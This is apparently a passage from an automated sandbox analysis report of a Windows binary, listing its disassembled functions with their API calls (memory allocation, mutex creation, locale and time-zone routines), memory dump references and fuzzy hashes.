Instruction ID: 47c81ef0cf567e4097a00b09bdb9fe95497ef594834ba0e038d0c08ab094a371
Opcode Fuzzy Hash: 2bbd389214606fdf99eea415a151996156015ab3f66345b9d67328ffe386fc39
Instruction Fuzzy Hash: 35519267608A8185E721DB29DC4836CA3A4FF89B68F954235CE7E077E5DE38E445C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BAD210 Relevance: 2.6, APIs: 2, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,00007FF720BC0004), ref: 00007FF720BAD27A
VirtualFree.KERNEL32(?,?,?,?,?,?,?,00007FF720BC0004), ref: 00007FF720BAD2B4

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: ec8545554d4a6bf9a39bf5eda0942499c7f15918e73b7330461e443d0cd978bd
Instruction ID: e46d2b69ae15463497ac8916993d5c1196bc7cf75da00adcc925dcb7d921a4c4
Opcode Fuzzy Hash: ec8545554d4a6bf9a39bf5eda0942499c7f15918e73b7330461e443d0cd978bd
Instruction Fuzzy Hash: 01318022B04A8686EA29DF25ED143BAA360FB44B94F980635CB6F07794DF3CE152C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0EB78 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0EBA0

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 468cd958f9aeeb1d3756a693b906aaad2789287379746cd4611b17bdade4590d
Instruction ID: 97b77fe8262c94c2c79e2d3f6578a3086f179c70ba04276f0661d586d23b8403
Opcode Fuzzy Hash: 468cd958f9aeeb1d3756a693b906aaad2789287379746cd4611b17bdade4590d
Instruction Fuzzy Hash: 1041C6B2A6860557EA18AB2CDA402BC77A1FF45794F940131DA4E87791CF39F492CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0E460 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0E557

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b10af8f814f489376099eec4d1b2bf2dee6a1fc06b5f619ad505525f2efba06e
Instruction ID: 2a5ac7fca13bb72e0a6fbb895098b7982f16da28eabc169956f033773ecd0987
Opcode Fuzzy Hash: b10af8f814f489376099eec4d1b2bf2dee6a1fc06b5f619ad505525f2efba06e
Instruction Fuzzy Hash: A4318FA2A5860585E6117B599C413BCA662FF84BA4FD54235E91D033D2DEBCF480CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C11A38 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11A5B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d92fb9f933d27554a6cb99c76bd027f6f14b4a50af115597ec1a8aa59d8bf4e5
Instruction ID: 14b592c931d59f6ccb37197fbd53fd0307506cddb3f13992ecc45f5b88be48b0
Opcode Fuzzy Hash: d92fb9f933d27554a6cb99c76bd027f6f14b4a50af115597ec1a8aa59d8bf4e5
Instruction Fuzzy Hash: A921C572A0864146D760AF1CD8403B9F6A1FF84B94F945234EA5D477D5DF3CE4418F20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFB5F4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB560

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fb79b73e31443315b15ba215925383b008ee0bd27683f4ef0e524f3c4fb95238
Instruction ID: f7560f95d3fe2a033c161f75169f454cec11bced308518a3275ce08dd9e0d9dd
Opcode Fuzzy Hash: fb79b73e31443315b15ba215925383b008ee0bd27683f4ef0e524f3c4fb95238
Instruction Fuzzy Hash: 01114A61A1C64689EA71BB15AC14BBDE2B1EF65B84F944031FA4E07786CE6DF8408B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFB880 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB8D4

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: af37a60413a17d8473b8d44331bda34389474ee41ecb07c9201159644b11a6c4
Instruction ID: 208b9d4705082e16099f576a836f77577ab30cfec7607c77667d9302d776e3e9
Opcode Fuzzy Hash: af37a60413a17d8473b8d44331bda34389474ee41ecb07c9201159644b11a6c4
Instruction Fuzzy Hash: 4901A561A0878544E924BB529D0447EE6A5FF85FE0F884631EE6D13BD6CE3CF5018B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0D8D4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa6a365d5d5c4294d64f83ce85103c55880a4483ee34e8b82cb97a1197a25a5
Instruction ID: 0acc305dd31c0d6f96c9fbd02283383bd54824e98466d44e2c7a51b37adfd875
Opcode Fuzzy Hash: 8fa6a365d5d5c4294d64f83ce85103c55880a4483ee34e8b82cb97a1197a25a5
Instruction Fuzzy Hash: FC1119A291864685EB15AF58D8402EDA762FF84750FD08232E65E067DACE7DF184CF30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFB3F8 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB415

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b9723b2fa6b8395273e2ffa61bfe6fca328ee90c81d1884146be664d7a584207
Instruction ID: a8eeef777208a357f03ed40373cf208c1156ff9547692381f097fc0a6a7aeb35
Opcode Fuzzy Hash: b9723b2fa6b8395273e2ffa61bfe6fca328ee90c81d1884146be664d7a584207
Instruction Fuzzy Hash: D2015E61E0850649FE247A699D596BD9261EF457A4FA40230F92B873E3CE3CF841CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BAD190 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FF720BAD1D1

Part of subcall function 00007FF720BAD210: VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,00007FF720BC0004), ref: 00007FF720BAD27A
Part of subcall function 00007FF720BAD210: VirtualFree.KERNEL32(?,?,?,?,?,?,?,00007FF720BC0004), ref: 00007FF720BAD2B4

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: dcc13f55656fb396d02a56895d196d25d38c93555ce6819a28256a1c2de6f193
Instruction ID: a614f4f46b9a9b1c6a5064bd000f010cb2cf41d38950c7db966f0879c218696e
Opcode Fuzzy Hash: dcc13f55656fb396d02a56895d196d25d38c93555ce6819a28256a1c2de6f193
Instruction Fuzzy Hash: 5EF01961609A8685EB65EF26ED442BC6260EB54B8CF481036DF1F4B755CF38E0608B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C095B8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF720C0AF15,?,?,?,00007FF720BFB3E1,?,?,?,?,00007FF720C10643), ref: 00007FF720C0960D

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8c92631ddd479108e65c3c82da5241e8d94697d5707ddd739e7f006b69fafb14
Instruction ID: 9543956c5cc4a302d6158ac1e92b978b3816dd26b155216b7525d922db0a295b
Opcode Fuzzy Hash: 8c92631ddd479108e65c3c82da5241e8d94697d5707ddd739e7f006b69fafb14
Instruction Fuzzy Hash: 63F04FC0B0A60741FE597AAA5C213F89292EF69B50FCC4530D90E86391DD2DF4C08A30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B80440 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF720BFB4E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB4F4

_fread_nolock.LIBCMT ref: 00007FF720B80483

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _fread_nolock_invalid_parameter_noinfo
String ID:
API String ID: 2335118202-0
Opcode ID: 15c3c532cb73625206ed1f9b06d8fcd0b23835c2a08478eab71b4d7046a8b065
Instruction ID: b2e16aa889001089dff7d7ccd969c5d45c63d1b7cd0a444cce2610adae983894
Opcode Fuzzy Hash: 15c3c532cb73625206ed1f9b06d8fcd0b23835c2a08478eab71b4d7046a8b065
Instruction Fuzzy Hash: F5F0362171464541EB949B16F98155D6364EB48BC4F885035FF5E83745DF38D5A18710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFB47C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB49E

Part of subcall function 00007FF720BFB3F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB415

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 762f786ab5525af94e295b21e3b2186b322adc5012f5be3598c3d5dbbca7c19f
Instruction ID: 65671267f5715876a90f64832e743e22737b6a363ffca8ca0627c5389c431721
Opcode Fuzzy Hash: 762f786ab5525af94e295b21e3b2186b322adc5012f5be3598c3d5dbbca7c19f
Instruction Fuzzy Hash: 0CF0BE20A4C68689E928BB69AD055BEE260EF41B90FE44130F62F473C3CE6CF4418F35

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B75074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE ref: 00007FF720B750C2

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
Instruction ID: be96b505f7cdbe9bfca20fc18c4966575836ad8575826573f17e54ae50c24535
Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
Instruction Fuzzy Hash: 27011927204A8485D715AF3EC8544ACB7A4FB09F8DB084225DF896736CEF25E545C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B7ECC0 Relevance: 1.4, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF720B7ECE5

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 258d358869d0156973fddf192d3b3550729c795473adcd661ce9d76028fbd30e
Instruction ID: 9d0e1f572a26a44f0948f7479ca2581f62a589f7e8a6e7d634edbc04dcfefa39
Opcode Fuzzy Hash: 258d358869d0156973fddf192d3b3550729c795473adcd661ce9d76028fbd30e
Instruction Fuzzy Hash: 7D41A3766046458AD731EF2A9C083ADB7A1FF48B94F940631DE6E0B7A5CE38F445CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BACF50 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?,?,00007FF720B8A78C,?,?,?,00007FF720B7A47A), ref: 00007FF720BACF8B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 25f0752e9c5e1c41a3bbac51f148e05c729895121489531105f02cbf924fc3bd
Instruction ID: 754d12dc4f6e00186fab11f02d8a347b9f0774e690160b09b9ba34e35c9f5b4c
Opcode Fuzzy Hash: 25f0752e9c5e1c41a3bbac51f148e05c729895121489531105f02cbf924fc3bd
Instruction Fuzzy Hash: DDE0ED6560AE8186EA68DB1AD8503ADB6A1FF9CB49F9CC131CE8D07714DF3DD0558B10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF720C1A3DC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF720C0AD3C: GetLastError.KERNEL32(?,?,?,00007FF720C0D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143), ref: 00007FF720C0AD4B
Part of subcall function 00007FF720C0AD3C: SetLastError.KERNEL32(?,?,?,00007FF720C0D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143), ref: 00007FF720C0ADE9

TranslateName.LIBCMT ref: 00007FF720C1A449
TranslateName.LIBCMT ref: 00007FF720C1A484
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF720C07518), ref: 00007FF720C1A4C9
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF720C07518), ref: 00007FF720C1A4F1

Strings

utf8, xrefs: 00007FF720C1A5D5

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: 37c6103468d14ebedd279d605b6ed83e4f92250a7d4cdd901299f417aef6e53b
Instruction ID: 74c7c2ed751eb63c31e30b24c0c20c720f3b82630e5782c2fa9fbf63040d69fb
Opcode Fuzzy Hash: 37c6103468d14ebedd279d605b6ed83e4f92250a7d4cdd901299f417aef6e53b
Instruction Fuzzy Hash: 8F918EB2A0874286EB24BB29D8112F9E2A5EF44B80F846131DA4D47795EF7CF5D1CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C1AE10 Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF720C0AD3C: GetLastError.KERNEL32(?,?,?,00007FF720C0D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143), ref: 00007FF720C0AD4B
Part of subcall function 00007FF720C0AD3C: SetLastError.KERNEL32(?,?,?,00007FF720C0D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143), ref: 00007FF720C0ADE9

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF720C07511), ref: 00007FF720C1AF67
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF720C1AF80
ProcessCodePage.LIBCMT ref: 00007FF720C1AFAA
IsValidCodePage.KERNEL32 ref: 00007FF720C1AFBC
IsValidLocale.KERNEL32 ref: 00007FF720C1AFD2
GetLocaleInfoW.KERNEL32 ref: 00007FF720C1B02E
GetLocaleInfoW.KERNEL32 ref: 00007FF720C1B04A

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: bb27ecb80f326de69b2bc042a2605d4d492ea8d5939a720322dd366a513871ed
Instruction ID: 85f3fab13ca188f89aca00f69b5e040852cf7727f5b759d0073c4245cf46b115
Opcode Fuzzy Hash: bb27ecb80f326de69b2bc042a2605d4d492ea8d5939a720322dd366a513871ed
Instruction Fuzzy Hash: C57168A2B186028AEB11AB68D8506F9F3B0FF48744F845135CA1D43B95EF3CB486CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C12D80 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF720C12DCA

Part of subcall function 00007FF720C12720: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C12734

_get_daylight.LIBCMT ref: 00007FF720C12DB9

Part of subcall function 00007FF720C12780: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C12794

_get_daylight.LIBCMT ref: 00007FF720C13042
_get_daylight.LIBCMT ref: 00007FF720C13053
_get_daylight.LIBCMT ref: 00007FF720C13064
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF720C13270), ref: 00007FF720C1308B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID:
API String ID: 435049134-0
Opcode ID: 1d5611dd2013931f37d8015da3d01ef343c2cc32922b092ad75f7cbd1318ed83
Instruction ID: 45fd2ebe5d7972f3df96c43670204e9c6a908aaf3196525a48ee235994ad576f
Opcode Fuzzy Hash: 1d5611dd2013931f37d8015da3d01ef343c2cc32922b092ad75f7cbd1318ed83
Instruction Fuzzy Hash: B6B19FAAA1865246EB20BF29DC405FAE662FF84784F845135EA4D43B85DE3CF4918F70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C04B08 Relevance: 9.2, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C04B2A
_get_daylight.LIBCMT ref: 00007FF720C04B8A
_get_daylight.LIBCMT ref: 00007FF720C04B9B
_get_daylight.LIBCMT ref: 00007FF720C04BAC
_isindst.LIBCMT ref: 00007FF720C04BFD
_isindst.LIBCMT ref: 00007FF720C04C50

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

